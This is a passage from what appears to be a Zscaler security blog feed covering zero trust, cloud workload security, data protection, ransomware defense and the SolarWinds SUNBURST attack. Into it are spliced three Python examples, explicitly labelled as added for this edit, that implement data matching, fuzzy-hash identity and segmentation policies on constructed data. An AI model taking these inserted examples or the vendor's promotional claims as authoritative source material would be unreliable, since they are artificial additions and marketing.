These services must be chained together, which introduces latency and operational complexity. With service chaining, the performance of the entire system is dictated by the slowest link in the chain. Because these systems have scale limits and are statically sized, you face a choice between dramatically over-provisioning to absorb traffic bursts and risking a slow user experience, or a self-inflicted denial of service, when unexpected traffic spikes do happen.

Connecting the VPCs hosting your applications to your outbound security VPC(s) also requires a Transit Gateway. The Transit Gateway acts like a cloud router and is a paid service with both an hourly and a data-transfer cost component. Every VPC, including any security VPCs, must be manually attached to the Transit Gateway and its routes maintained.

At this point, you will probably also create a management VPC in which to run firewall management and orchestration software to centrally manage the growing inventory of security services.

So, even after working through the first five challenges, you end up with:
- High cost
- Poor scalability
- Questionable availability
- High-overhead, error-prone management
- Poor visibility across many hops, making it difficult to troubleshoot

Figure 1: Legacy security raises risk and complexity

And all of this complexity buys you a deployment in a single availability zone (AZ). The process has to be repeated for every AZ in your cloud footprint.

Figure 2: For multi-cloud, complexity grows multi-fold

Secure, simple workload-to-internet access

Fortunately, there is a better path forward with Zscaler Workload Communications (ZWC).
ZWC drastically simplifies internet security for cloud workloads by providing automated, flexible, and direct connectivity through the Zscaler Zero Trust Exchange. Powered by Zscaler Internet Access (ZIA) and Cloud Connector, the solution provides deep visibility into, and full control of, outbound traffic from any cloud. ZWC provides a lightweight, fully automated deployment infrastructure that is operational in seconds. From there, simple business-level policies steer traffic to the Zscaler cloud via unified management. All internet access is protected by the scalable, secure ZIA service that already protects thousands of enterprises and millions of users globally.

The benefits are clear:
- Simplified connectivity: no backhauling, and no peering, route distribution, or service chaining to maintain.
- Scalability, via the industry's largest security cloud.
- Performance: Cloud Connector, deployed in your VPCs, is built on DTLS, delivering four to five times the performance of IPsec.
- Visibility, with full logging on a single, integrated platform that simplifies operations and troubleshooting.

Figure 3: Zscaler Workload Communications: Secure, simple connectivity

To deliver cloud security at scale, you cannot replicate an on-premises approach in the cloud. Zscaler Workload Communications provides security, simplicity, and high performance for workload-to-internet access. If the challenges highlighted in this post sound familiar, learn more about the full suite of Zscaler Cloud Protection services or contact us today.

Thu, 28 Jan 2021 08:00:01 -0800 Rich Campagna

The Zero Trust Architecture Through the Lens of U.S. Federal Agencies

Ask five IT leaders from five different federal agencies to explain zero trust, and you will get five different definitions. I've noticed this disparity when speaking with them during workshops and roundtable discussions.
And it's understandable, because any time a new term or technology is introduced, vendors claim that their solutions meet that definition, whether they do or not. Confusion is inevitable. The fact is that IT and security professionals naturally bring their own experiences and technology lenses to the adoption of any new technology. Let's take a look at zero trust through some of those federal lenses.

First, the network

Some federal IT leaders began their exploration of zero trust by looking at their networks. Five to 10 years ago, federal organizations believed the network was the most important thing and built their security mechanisms around protecting it. But times have changed, and federal agencies are now looking beyond the network. One member of a federal cybersecurity team described the role of zero trust as "moving toward a place where logical network placement is not some kind of pseudo-authenticating mechanism, and dissolving, as much as possible, the notion of the strong network perimeter. The pandemic has been a catalyst for people to realize their strong network perimeter isn't what they thought it was."

What about IT?

Some look at zero trust from an IT perspective. These federal leaders see IT's role evolving from infrastructure-focused to product-focused or, in some cases, application-focused, and they see zero trust playing a critical part in that. IT's mission and capabilities are moving toward supporting agency objectives. So, for some IT and networking leaders, zero trust takes on increased importance because it secures the transport network, the internet, more completely than legacy security models that were designed only to protect the data inside your own network.

Defining trust

One federal leader I've spoken to believes the term zero trust is a misnomer because, if you don't trust anyone, nobody will get anything done.
As he described it, the concept of zero trust is really a matter of establishing what trust levels are available and then deciding what access to grant at each level. So it's just another way of saying that entities (people, devices, applications) get least-privileged access: the minimum needed to get the job done. Another federal IT leader described the concept as variable trust, meaning that a user accessing the network on a corporate-managed or corporate-issued device earns more trust than someone using an unknown device. The same applies to users attempting to access the network from inside the corporate office as opposed to a remote location.

What are you trying to protect?

An important question for many federal agencies is: What are you trying to protect? In many cases, the goal isn't protecting every device but protecting the data going to and from each device. So agencies are focused on moving protections closer to the assets they are actually trying to protect.

It's all about access

Federal agencies realize they must consider many factors when allowing someone access to an app or piece of data: Who is getting access? What are the assurances? How did they authenticate? In short, an agency will extend more trust to a request arriving over a network it manages on-prem than to one backed only by other forms of authentication, such as a username and password. Federal leaders seem to agree that zero trust is a better way to manage access. It's a better way for agencies to truly understand who's accessing their networks and data and what they are doing with that data. And they know they have to continually evaluate a multitude of factors to decide whether a person can have, and keep, access. As one federal leader said, you have to look at the bigger picture when it comes to zero trust.
But access doesn't only mean people

As a perceptive member of a federal agency also said, people sometimes forget that it's not always a user accessing data. Your systems are also sharing data, and so are applications, often between different clouds. Many in our industry talk about data as if it's always sitting still, which it isn't. A zero trust solution must protect data in motion as well as data at rest, applying agency policies to every connection.

A simple test

So, with federal IT and networking leaders looking at zero trust through different lenses, it might help to create a simple litmus test to determine whether a so-called zero trust solution actually is one. One agency leader suggested looking at a solution and asking, "If the user's device is inside the 'castle,' is that the primary mechanism around the security?" If it is, then it's not a zero trust solution.

It's all about better protection

While many within the federal space may have different perspectives on precisely what zero trust is or what constitutes a zero trust solution, in the end they all have something in common: finding a new way to protect their data, employees, and citizens in an evolving world of cloud, mobility, and telework.

Read this GovLoop solution brief, Security Beyond the Desktop, or listen to this podcast to hear more about zero trust.

Wed, 27 Jan 2021 11:33:08 -0800 Jose Padin

Safeguarding Your Data in 2021 and Beyond

For information on Zscaler Data Protection, check out our new guide.

Data protection is defined as the process of safeguarding your important and sensitive information from corruption, compromise, or loss. There was a time when that amounted to preventing data from being moved inappropriately, whether intentionally or accidentally, which could be handled with a good data loss prevention (DLP) solution. After all, your applications and servers were in the data center and your employees were mostly on the network.
All you had to do was monitor the outbound gateway for data and destinations that met certain conditions.

Fast forward to 2020. Most of your apps and data, including your sensitive customer data and your company's IP "crown jewels," had been migrated to cloud platforms. Then, right around March, all your office workers were suddenly sent home. A simple DLP solution, even with a cloud access security broker (CASB) added, was suddenly nowhere near adequate to give you control over the massive amount of data now distributed across your cloud apps. Why? Traditional DLP and CASB solutions were designed for specific functions; they lack the broad data protection capabilities you need when users connect to your data from everywhere, including unsecured networks and public Wi-Fi, and they do nothing to prevent cloud misconfigurations, which are among the most common causes of data exposure. With SaaS and multicloud environments, it has become far too easy for data to be inadvertently exposed through a lack of visibility.

There are other challenges as well:
- Your data is everywhere: data is spread across clouds, SaaS, users' devices, and the data center.
- Your data is encrypted: connections to applications are encrypted, so data exposure is largely hidden from any control that does not inspect TLS.
- Your compliance is unknown: application deployment and usage are spread across locations and groups, making unified assurance impossible.

To address these challenges, you need a comprehensive data protection strategy that gives you the big picture of your environment: every user, application, and device that is accessing or moving your data. If you tried to build a solution with point products, you would end up with massive complexity and a disjointed view of your environment.
Instead, you need an integrated solution that provides unified visibility and policy enforcement, with capabilities that include DLP with Exact Data Match, CASB (inline and out-of-band), browser isolation, cloud security posture management, SaaS security posture management, and SSL inspection at scale, so you can:
- Follow and secure users off-network without performance degradation: a purpose-built SASE architecture delivers comprehensive data protection as part of a large, integrated platform built on a high-performance inline cloud distributed across 150 global data centers.
- Inspect all of your encrypted traffic: the Zscaler Zero Trust Exchange inspects all SSL/TLS traffic for data exposure, with unlimited inspection capacity per user.
- Gain visibility into compliance: Zscaler Data Protection helps you maintain compliance by scanning your SaaS, Microsoft 365, and public cloud environments for violations and misconfigurations.
- Reduce risk with inline enforcement: Zscaler sits inline, so it can block sensitive information before it leaves your network instead of being limited to damage control after data has been compromised.
- Simplify data protection with one platform and one policy: secure all your cloud data channels (data in motion, at rest, and across endpoints and clouds) with one unified platform, the Zscaler Zero Trust Exchange.

Today, almost a month into 2021, the question of an eventual return to the office persists, though most agree that we are likely to see a "hybrid" workforce, with employees in the office some of the time and working remotely the rest. In other words, work-from-anywhere is here to stay. This reality has accelerated the migration to public clouds and services that simplify access.
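Of the capabilities listed above, Exact Data Match (EDM) is the one whose mechanics are least obvious, so here is a worked sketch of it. This is an added example written for this edit, not Zscaler's implementation: the index holds keyed fingerprints of normalized cells rather than the raw records, and a document is flagged only when several cells from the same row appear together, which is what separates EDM from a pattern that fires on any nine-digit number. The key, column names and rows are constructed for the demo.

```python
"""Exact Data Match (EDM) sketch for structured sensitive records.

Added example, not Zscaler's implementation. The index never stores the
customer table in clear, only HMAC fingerprints of normalized cells, and a
match requires min_fields cells of one record to co-occur in the scanned text.
"""
import hashlib
import hmac
import re
from collections import defaultdict
from typing import Dict, List, Sequence

STRIP = ".,;:!?()[]\"'<>"


def normalize(value: str) -> str:
    """Case-fold and drop separators so 123-45-6789 and 123 45 6789 agree."""
    return re.sub(r"[\s\-\.\(\)]", "", value).lower()


def fingerprint(key: bytes, value: str) -> str:
    return hmac.new(key, normalize(value).encode(), hashlib.sha256).hexdigest()[:20]


def candidates(text: str, max_words: int = 3):
    """Every run of 1..max_words whitespace-separated words, punctuation trimmed,
    so multi-word cells such as a full name can still match."""
    words = [w.strip(STRIP) for w in text.split()]
    words = [w for w in words if w]
    for i in range(len(words)):
        for n in range(1, max_words + 1):
            if i + n <= len(words):
                yield " ".join(words[i:i + n])


class EdmIndex:
    def __init__(self, key: bytes, columns: Sequence[str], rows: Sequence[Sequence[str]]):
        self.key = key
        self.columns = list(columns)
        self.table: Dict[str, set] = defaultdict(set)   # fingerprint -> {(row, column)}
        for row_id, row in enumerate(rows):
            for column, cell in zip(columns, row):
                if normalize(cell):
                    self.table[fingerprint(key, cell)].add((row_id, column))

    def scan(self, text: str, min_fields: int = 2) -> Dict[int, List[str]]:
        """Rows for which at least min_fields distinct columns occur in text."""
        hits: Dict[int, set] = defaultdict(set)
        for cand in candidates(text):
            for row_id, column in self.table.get(fingerprint(self.key, cand), ()):
                hits[row_id].add(column)
        return {row_id: sorted(cols) for row_id, cols in hits.items() if len(cols) >= min_fields}


def build_demo_index() -> EdmIndex:
    """Constructed records; the key would normally live with the index, not the scanner."""
    columns = ("name", "email", "ssn")
    rows = [
        ("Jane Doe", "jane.doe@example.com", "123-45-6789"),
        ("Ravi Patel", "ravi.patel@example.com", "987-65-4321"),
    ]
    return EdmIndex(b"constructed-demo-key", columns, rows)


def demo() -> Dict[str, Dict[int, List[str]]]:
    index = build_demo_index()
    return {
        "two_fields": index.scan("Jane Doe (SSN 123 45 6789) asked for a copy of her file."),
        "one_field": index.scan("Jane Doe called about the meeting."),
        "other_row": index.scan("Forwarding ravi.patel@example.com, SSN: 987-65-4321, for onboarding."),
        "nothing": index.scan("Quarterly numbers: 123-45-6789-0 are not an SSN."),
    }


if __name__ == "__main__":
    print(demo())
```

Requiring two or more fields from the same row is the point of the technique: a common first name or a bare number on its own does not trigger, while a name plus the matching SSN does, even when the SSN is written with different separators than the record.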
That means it's time to rethink your data protection strategy and look for a data protection solution that prevents data loss, helps maintain strict compliance, automatically remediates cloud misconfigurations, and has the visibility to follow your users and data off-network, all without adding complexity or hindering performance for users.

Learn more about evolving your data protection strategy to address the challenges of today's cloud-first, work-from-anywhere environment with Zscaler in our latest ebook, Safeguarding Your Data in a Work-from-Anywhere World.

Tue, 26 Jan 2021 08:00:01 -0800 Jen Toscano

Applying Zero Trust to Cloud Workloads

Over the last few years, zero trust has achieved widespread acceptance and adoption, and rightly so. The zero trust security model significantly reduces risk by minimizing the enterprise attack surface and limiting the ability of bad actors to move laterally within a network. With zero trust, organizations move from a "trust but verify" approach to "never trust, always verify."

Technically, zero trust applies to all users, devices, and workloads, but in most organizations it has become synonymous with user access to applications. As organizations shift to the cloud, applying zero trust principles to cloud workloads is as critical as applying the model to user access. So, how do you accomplish this? Start by assuming that everything, both internal and external to the network, is untrusted and requires verification before being granted access. Authenticating and authorizing everything that attempts to access the network builds an identity for every workload. Then, use that identity to build least-privilege policies that restrict workload access to only what is absolutely necessary.

Identify users AND applications

A core principle of zero trust access is that all users must be authenticated and authorized before being granted access.
Most implementations leverage not only strong authentication but several elements of context, such as endpoint posture, when making access decisions. With workloads, authentication and authorization are a bit more challenging to achieve, but easily doable with the right technologies. In most implementations, unless a workload has been identified by a set of attributes, such as a workload fingerprint or identity, it is untrusted and blocked from communicating. Zscaler Workload Segmentation, for example, computes a cryptographic identity for every workload. This identity takes into account dozens of variables, including hashes, process identifiers, behaviors, container and host ID variables, reputation, hostnames, and more. The identity is verified every time a workload attempts to communicate and is paired with least-privilege policies when determining whether or not to grant access.

Least-privileged access for users AND applications

Before zero trust, the model for users, whether on the local network or remote, assumed that the user could be trusted with permissive access and that their identity had not been compromised. Basically, users could access anything on the corporate network, which made it very convenient for bad actors to move laterally across an organization's network. Zero trust changes that by implementing least-privilege principles, granting users access not to networks but only to the specific applications and resources they need to get their job done. In this model, if a user's identity is compromised or the user turns malicious, the damage they can do is limited by the much narrower set of resources and applications they can access.
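The workload identity described above, and the fuzzy-hash idea from the application identity post earlier on this page (stable attributes plus a similarity hash, so a rule survives an upgrade of the binary), can be shown end to end in a few dozen lines. The following is an added example written for this edit, not Zscaler Workload Segmentation code: it uses a toy context-triggered piecewise hash where a real deployment would use ssdeep or TLSH, and the attribute names (host_uuid, exe_path), the 70 percent threshold and the "binaries" are constructed for the demo.

```python
"""Version-tolerant application identity with a similarity (fuzzy) hash.

Added example; not Zscaler Workload Segmentation code. The fuzzy hash splits
the file at content-defined boundaries, hashes each chunk to one character,
and compares signatures by edit distance, so a small patch changes a few
characters instead of the whole hash. Production systems use ssdeep or TLSH.
"""
import hashlib
import random
from dataclasses import dataclass

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
WINDOW = 7    # bytes fed into the boundary trigger
BLOCK = 64    # average chunk length; one signature character per chunk


def fuzzy_hash(data: bytes, block: int = BLOCK) -> str:
    """Context-triggered piecewise hash: boundaries depend on content, so the
    chunks after a patch re-synchronise with the unpatched file."""
    sig, start = [], 0
    for i in range(len(data)):
        window = data[max(0, i - WINDOW + 1):i + 1]
        if sum(window) % block == block - 1:          # content-defined boundary
            digest = hashlib.sha256(data[start:i + 1]).digest()
            sig.append(ALPHABET[digest[0] % len(ALPHABET)])
            start = i + 1
    if start < len(data):                             # trailing chunk
        digest = hashlib.sha256(data[start:]).digest()
        sig.append(ALPHABET[digest[0] % len(ALPHABET)])
    return "".join(sig)


def _levenshtein(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def similarity(sig_a: str, sig_b: str) -> int:
    """0..100 score; 100 means identical signatures."""
    longest = max(len(sig_a), len(sig_b))
    if longest == 0:
        return 100
    return round(100 * (1 - _levenshtein(sig_a, sig_b) / longest))


@dataclass(frozen=True)
class AppIdentity:
    host_uuid: str   # unchanging attribute (assumed: SMBIOS UUID)
    exe_path: str    # unchanging attribute
    sha256: str      # exact hash: changes on every rebuild
    fuzzy: str       # similarity hash: survives small upgrades


def identity_of(host_uuid: str, exe_path: str, binary: bytes) -> AppIdentity:
    return AppIdentity(host_uuid, exe_path,
                       hashlib.sha256(binary).hexdigest(), fuzzy_hash(binary))


def policy_matches(rule: AppIdentity, observed: AppIdentity, threshold: int = 70) -> bool:
    """A rule written against one build keeps applying after an upgrade when
    the stable attributes are equal and the binaries are similar enough."""
    if (rule.host_uuid, rule.exe_path) != (observed.host_uuid, observed.exe_path):
        return False
    if rule.sha256 == observed.sha256:
        return True
    return similarity(rule.fuzzy, observed.fuzzy) >= threshold


def demo() -> dict:
    """Constructed binaries: v1, a patched v2 (64 bytes changed) and an
    unrelated file of the same size."""
    rng = random.Random(7)
    v1 = bytes(rng.getrandbits(8) for _ in range(4096))
    v2 = bytearray(v1)
    v2[2000:2064] = bytes(rng.getrandbits(8) for _ in range(64))
    other = bytes(rng.getrandbits(8) for _ in range(4096))

    rule = identity_of("host-A", "/opt/app/server", v1)
    upgraded = identity_of("host-A", "/opt/app/server", bytes(v2))
    stranger = identity_of("host-A", "/opt/app/server", other)
    moved = identity_of("host-B", "/opt/app/server", v1)   # same binary, other host
    return {
        "same": similarity(rule.fuzzy, rule.fuzzy),
        "upgrade": similarity(rule.fuzzy, upgraded.fuzzy),
        "unrelated": similarity(rule.fuzzy, stranger.fuzzy),
        "match_upgrade": policy_matches(rule, upgraded),
        "match_unrelated": policy_matches(rule, stranger),
        "match_other_host": policy_matches(rule, moved),
    }


if __name__ == "__main__":
    print(demo())
```

The exact SHA-256 still answers "is this the very build I approved"; the fuzzy score answers "is this a close relative of it", and the unchanging attributes keep a similar binary on a different host from inheriting the rule.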
As we have learned from countless ransomware and malware attacks, and from compromised legitimate software, as in the SolarWinds attack, applying the same least-privilege concepts to workloads can dramatically lower the risk of a breach and limit the blast radius of compromised or malicious software. Least privilege for cloud workloads means that, rather than creating flat networks that allow overly permissive access in your cloud environments, your policies allow only the users and applications that a workload requires in order to function.

Zero trust for cloud workloads

Once these two steps are completed, only known and verified workloads can communicate on the network, and those workloads have access only to the users, applications, and resources necessary for them to function. The result? Dramatic risk reduction and elimination of attack surface. Malicious software will be unable to authenticate and will be kept off the network entirely. And if a bad actor does compromise a workload, the attacker's ability to move laterally across the network will be severely curtailed.

Thu, 21 Jan 2021 08:00:01 -0800 Rich Campagna

Combating Ransomware with Zero Trust

The scourge of ransomware attacks continues to plague nearly every public-sector institution and private organization. No one is immune. In 2019, there were more than 140 ransomware attacks against governmental and health care organizations, and in 2020 hospitals in particular were relentlessly targeted. It's critical for every IT pro, in every industry, to defend against ransomware.

Read the white paper Defending Against Ransomware with Zscaler Workload Segmentation.

Ransomware is not a new threat

The first example appeared as early as 1989, but cybercriminals didn't start launching widespread attacks until about 2012. Typically, ransomware takes one of two vectors to infect a network: a phishing attack, or the exploitation of security holes.
In the case of a phishing attack, the target receives an email with a document that, once opened, launches the ransomware. In some cases, the attack may use social engineering to trick the user into providing credentials that facilitate the attack. Other types of ransomware don't require anyone to click on an infected document. Instead, they take advantage of security holes to compromise systems. NotPetya is a particularly nasty example of this variant. It arrived through a backdoored update of an accounting package popular in Ukraine (M.E.Doc) and then spread to other systems through flaws (since patched), known as EternalBlue and EternalRomance, in the Windows implementation of the SMB (Server Message Block) protocol. What makes NotPetya so destructive is that it was never really about a ransom: it encrypts with a randomly generated key that is not preserved, and the "installation key" shown to victims is random data with no relationship to it, so there is no way to recover the data. The encrypted data is permanently destroyed.

In recent years, ransomware has become much more sophisticated. Many strains no longer encrypt the first machine they land on. Instead, the malware first surveils the environment to determine how it can move laterally across the network to infect additional resources, often using legitimate tools and protocols, such as reconnaissance over the Security Account Manager Remote (SAMR) protocol and Domain Name System (DNS) reconnaissance with nslookup. With this information, the malware quietly moves across the network to plant ransomware on additional systems. Once a critical mass has been reached, the ransomware encrypts all of these resources at once, delivering a crippling blow to the organization.

Defending against ransomware

We often hear that the best defense against a ransomware attack is robust data protection. After all, if you have backups, you don't need to pay the ransom and can simply restore all files.
Even if the malware does successfully encrypt an organization's data, so long as the backup and disaster recovery (DR) files are intact, the organization can avoid paying the ransom and IT can restore everything to a point before the attack. But backups are best kept as a last line of defense, not the front line. If the attack is devastating enough, IT may face restoring petabytes of data, a process that can take days or even weeks and that halts business operations for an extended period. Even worse, if backups are reachable from the network, ransomware can digitally shred them as well, leaving no option but to pay the ransom, which is a terrible position to be in, and not just because of the cost. After officials in Lake City, Florida, paid a ransom to decrypt their affected data, roughly a couple hundred terabytes, the decryption process took more than eight days to complete. For larger organizations with petabytes of data, the process could take more than a month.

Likewise, we hear a lot about the importance of training employees to avoid clicking on documents used in phishing attacks, but this, too, is nowhere near sufficient. Cybercriminals are constantly developing novel ways to trick employees, and in a sufficiently large organization someone will eventually click on an infected file. What's more, employee training does nothing to defend against attacks that exploit security holes; no one has to click on anything for those to succeed.

A zero trust approach to thwarting ransomware

In a zero trust environment, all internal communications are treated as potentially hostile. Each communication between workloads must be authorized before it is allowed. In this way, zero trust can stop ransomware from moving laterally across the network, which can mean the difference between the malware encrypting a single laptop and encrypting hundreds of servers and datastores around the globe.
Zero trust is enabled by microsegmentation, but traditional methods of microsegmenting a network depend on "trusted" IP addresses, which raises significant operational and security concerns. Operationally, policies break when the underlying network changes, and modern networks change constantly. It's even harder to manage policies in autoscaling environments, such as the cloud or containers, in which IP addresses are ephemeral: IT would have to update policies constantly as addresses change, which is labor-intensive and error-prone. What's more, ransomware can evade address-based controls by piggybacking on approved firewall policies, because firewalls are not designed to distinguish good software from bad; any process running on an allowed address inherits the rule.

There is a newer model for microsegmentation that relies on the identity of the communicating software, hosts, and devices, separating the control plane from the network for better security and easier operations. With an identity-based approach, each workload is assigned an immutable, unique identity (or fingerprint) based on dozens of properties of the asset itself, such as the BIOS UUID, processor serial numbers, or the SHA-256 hash of a binary, and that identity is verified before the workloads are allowed to communicate. This verification prevents malicious software, devices, or hosts from communicating. For example, say someone clicks an infected file, which launches ransomware on that user's desktop. If the ransomware tries to use the SAMR protocol or nslookup to conduct network reconnaissance, identity-based zero trust policies block that communication, because the ransomware is not an authorized workload, even though it runs on an authorized host with an allowed address. Likewise, attempts to move to other assets are denied. In this way, even if ransomware gains an initial foothold, the damage it can do is limited to an annoyance rather than a global business catastrophe.
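The contrast drawn in this section and in the cloud workloads post above, between rules keyed on identity and rules keyed on addresses, is easiest to see with both policy engines side by side. The following is an added example written for this edit, not the Zscaler Workload Segmentation engine: the identity is a hash over constructed asset attributes (SMBIOS UUID, binary path, SHA-256 of the binary), the hosts, hashes and addresses are made up, and SAMR reconnaissance is represented by its SMB port and nslookup by DNS.

```python
"""Identity-based versus address-based segmentation policy.

Added example; not the Zscaler Workload Segmentation engine. Rules bind
workload identities derived from the asset itself, never addresses, so an
unknown binary is denied even from an allowed host, and a known workload keeps
its access when its IP changes. The address policy beside it shows the
piggybacking problem the text describes.
"""
import hashlib
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Tuple

SMB = 445        # SAMR reconnaissance rides on SMB named pipes
DNS = 53         # nslookup reconnaissance
POSTGRES = 5432


@dataclass(frozen=True)
class Workload:
    host_uuid: str     # stable as the host changes address
    exe_path: str
    exe_sha256: str    # changes if the binary is replaced or tampered with
    ip: str            # transport detail: ephemeral, never part of the identity

    @property
    def identity(self) -> str:
        raw = f"{self.host_uuid}|{self.exe_path}|{self.exe_sha256}"
        return hashlib.sha256(raw.encode()).hexdigest()[:16]


@dataclass(frozen=True)
class IdentityRule:
    src: str       # identity fingerprints, not addresses
    dst: str
    port: int


class IdentityPolicy:
    def __init__(self, known: Dict[str, str], rules: List[IdentityRule]):
        self.known = known                                    # identity -> label (verified inventory)
        self.rules = {(r.src, r.dst, r.port) for r in rules}

    def decide(self, src: Workload, dst: Workload, port: int) -> Tuple[bool, str]:
        if src.identity not in self.known:                    # default deny for anything unverified
            return False, "source identity unverified"
        if dst.identity not in self.known:
            return False, "destination identity unverified"
        if (src.identity, dst.identity, port) in self.rules:
            return True, f"{self.known[src.identity]} -> {self.known[dst.identity]}:{port}"
        return False, "no least-privilege rule"


class AddressPolicy:
    """Conventional allow-list keyed on source subnet and destination address."""
    def __init__(self, rules: List[Tuple[str, str, int]]):
        self.rules = [(ipaddress.ip_network(s), ipaddress.ip_address(d), p) for s, d, p in rules]

    def decide(self, src: Workload, dst: Workload, port: int) -> Tuple[bool, str]:
        for net, addr, p in self.rules:
            if ipaddress.ip_address(src.ip) in net and ipaddress.ip_address(dst.ip) == addr and p == port:
                return True, f"{net} -> {addr}:{port}"
        return False, "no address rule"


def sha(s: str) -> str:
    return hashlib.sha256(s.encode()).hexdigest()


def demo() -> Dict[str, Tuple[bool, str]]:
    web = Workload("uuid-web-1", "/opt/app/web", sha("web-build-41"), "10.0.1.10")
    web_moved = Workload("uuid-web-1", "/opt/app/web", sha("web-build-41"), "10.0.1.77")
    db = Workload("uuid-db-1", "/usr/lib/postgresql/bin/postgres", sha("pg-13"), "10.0.2.20")
    dc = Workload("uuid-dc-1", "C:\\Windows\\System32\\lsass.exe", sha("lsass"), "10.0.2.5")
    explorer = Workload("uuid-desk-7", "C:\\Windows\\explorer.exe", sha("explorer"), "10.0.1.50")
    ransom = Workload("uuid-desk-7", "C:\\Users\\u\\AppData\\Local\\Temp\\invoice.exe", sha("ransom"), "10.0.1.50")

    known = {w.identity: label for w, label in [(web, "web"), (db, "db"), (dc, "dc"), (explorer, "explorer")]}
    idp = IdentityPolicy(known, [
        IdentityRule(web.identity, db.identity, POSTGRES),
        IdentityRule(explorer.identity, dc.identity, SMB),    # desktop reaching a domain share
    ])
    adp = AddressPolicy([("10.0.1.0/24", "10.0.2.5", SMB), ("10.0.1.10/32", "10.0.2.20", POSTGRES)])
    return {
        "web_to_db": idp.decide(web, db, POSTGRES),
        "web_moved_to_db": idp.decide(web_moved, db, POSTGRES),
        "web_moved_to_db_by_ip": adp.decide(web_moved, db, POSTGRES),
        "explorer_samr": idp.decide(explorer, dc, SMB),
        "ransom_samr": idp.decide(ransom, dc, SMB),            # same host, same IP, unknown binary
        "ransom_dns": idp.decide(ransom, dc, DNS),
        "ransom_samr_by_ip": adp.decide(ransom, dc, SMB),
        "web_to_dc": idp.decide(web, dc, SMB),
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:24} {verdict}")
```

Two results carry the argument: the ransomware on the desktop is allowed to the domain controller by the address policy (it shares the desktop's subnet) and denied by the identity policy (its binary was never verified), while the web workload that changed address is still allowed by the identity policy and silently broken by the address one.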
Learn more by reading the white paper Defending Against Ransomware with Zscaler Workload Segmentation.

Tue, 19 Jan 2021 08:00:02 -0800 Dan Perkins

Supply Chain Attacks

ABSTRACT

In this article we review what supply chain attacks are, how they evolved, and how we ended up with SUNBURST, a supply chain attack targeting the well-known SolarWinds Orion monitoring platform. We also discuss how this advanced adversary evaded common detection capabilities and how you can determine whether you have been affected by this attack. The article further provides recommendations on how to deal with these types of attacks in the future, using commonly known principles and available technologies.

Introduction

Supply chain attacks, attacks against the supply or value chain of an organization in order to gain access to a downstream target, often sound like the stories of targeted attacks against government agencies found in Hollywood movies. In reality, while these attacks involve a high degree of planning and sophistication, they can have a devastating real-world impact on organizations in the blast radius of the original compromise, as in the case of the recent SolarWinds attacks.

In general, we differentiate between two major types of attacks on an organization's supply or value chain. "Island hopping" attacks target potentially vulnerable partners or elements in the value chain that have privileged access to the actual target network. Named after the island hopping strategy of the United States in the Pacific campaign of World War II, this type of attack may traverse multiple vulnerable elements in order to reach the actual target. We have seen such attacks against prominent targets in the retail industry, where suppliers were the initial entry point, and in plenty of other industries in similar forms.
“Supply chain” attacks are slightly different, as they seek to exploit the trust relationship established by legitimate products used in normal business operations. These attacks seek to gain unauthorized access to a target organization by implanting backdoors into products used by the target organization—most commonly via delivery of automated patches or software updates. Such attacks have also been observed targeting technology companies, including antivirus vendors and makers of network security equipment, but are surely not limited to such companies, given the wealth of other potential high-value targets. Both of these types of attacks might target more than one organization, and the objective might be to gain access to, or collect information on, whole industries or widespread organizations or individuals. At the same time, organizations that are simply used as one of these islands can also incur massive reputational and business damage, while not even being the actual target of such a campaign.

The evolution of supply chain attacks

As news broke in 2013 and 2014 about attacks against Target and Home Depot, organizations worldwide started evaluating their value chain and its data interconnectivity. These attacks were textbook island hopping attacks, performed through suppliers by cybercriminals to harvest payment card information at a large scale. Data interconnectivity between companies allows organizations to implement highly efficient processes: from design, to prototyping, to manufacturing, to logistics, to just-in-time delivery to the end customer. While these tightly interwoven connections help companies save billions of dollars through increased efficiency and bring innovation to market at unprecedented speeds, the attacks of the early 2010s reminded organizations of the attack surface such connectivity provides to adversaries.
As a result, security professionals started viewing business partners that require their process automation to be connected to their networks with the same distrust as any other anonymous connection. This shift led to increased security awareness and additional controls to monitor interconnectivity; increasingly, security certifications such as ISO 27001 (which in its annex 15 specifically calls out the security evaluation of vendors in the value chain) were required of such partners before a connection between networks was established. Most of these island hopping attacks rely on the presence of authorized access, or on an exploitable vulnerability in the form of a software weakness or misconfiguration in systems. As organizations become more diligent and disciplined about patching existing systems, applying best-practice configurations, and segmenting their networks, it has become harder for adversaries to find exploitable weaknesses than it used to be.

In 2015, allegations surfaced of a secret backdoor in the Secure Shell (SSH) authentication mechanism of Juniper’s JunOS. This backdoor, implanted by an unknown threat actor into the equipment of a prominent U.S.-based network security equipment manufacturer, may have been in place for years. During that same year, a suspected backdoor embedded in a popular antivirus product was involved in a high-profile leak of highly classified information of the National Security Agency. While largely unnoticed by the broad public, the news about these types of backdoors put many security professionals on high alert, as such attacks exploit the trust we put in the integrity and inherent security of such technologies. The supply chain attack involving SolarWinds Orion in late 2020 only marks the latest example of this type of attack.

A Solar Storm

Much has been written about the supply chain attack involving the backdoor dubbed "SUNBURST" within the SolarWinds Orion platform.
Rather than dissecting the technical details yet again, it is important to take a look at what companies should do to identify whether they were affected and what the next steps should be.

Who is affected?

The easiest way to identify whether your organization was affected is to check whether one of the compromised SolarWinds Orion products and versions is in use in your environment (read our blog). To maintain operational security in their efforts to remain undetected, the adversary in this specific attack appears to have used the backdoor in SolarWinds Orion only in cases where the target environment appeared to be of specific interest. Whether access was attempted and obtained can only be determined, and only to some extent, by analyzing network activity, because the campaign is suspected to have started on or before March 2020 and did not involve any known indicators of compromise. Due to the sheer volume of data involved, many organizations do not keep access logs long enough to determine whether or not a successful compromise occurred.

Did protections fail?

Detecting the SUNBURST backdoor implanted in SolarWinds Orion is difficult to accomplish with existing automated capabilities, even ones designed to identify previously unknown threats, such as malware sandboxes. This difficulty is due to a list of factors that showcase the extreme care the adversaries took to hide their tracks. The backdoor was delivered through a legitimate software update to a known monitoring and management tool. It also required the software update containing the backdoor to be successfully installed, which required specific software components to already be present on the target system. Most sandboxes use operating system versions commonly found on endpoint systems, and only include a list of common applications to mimic an end-user system.
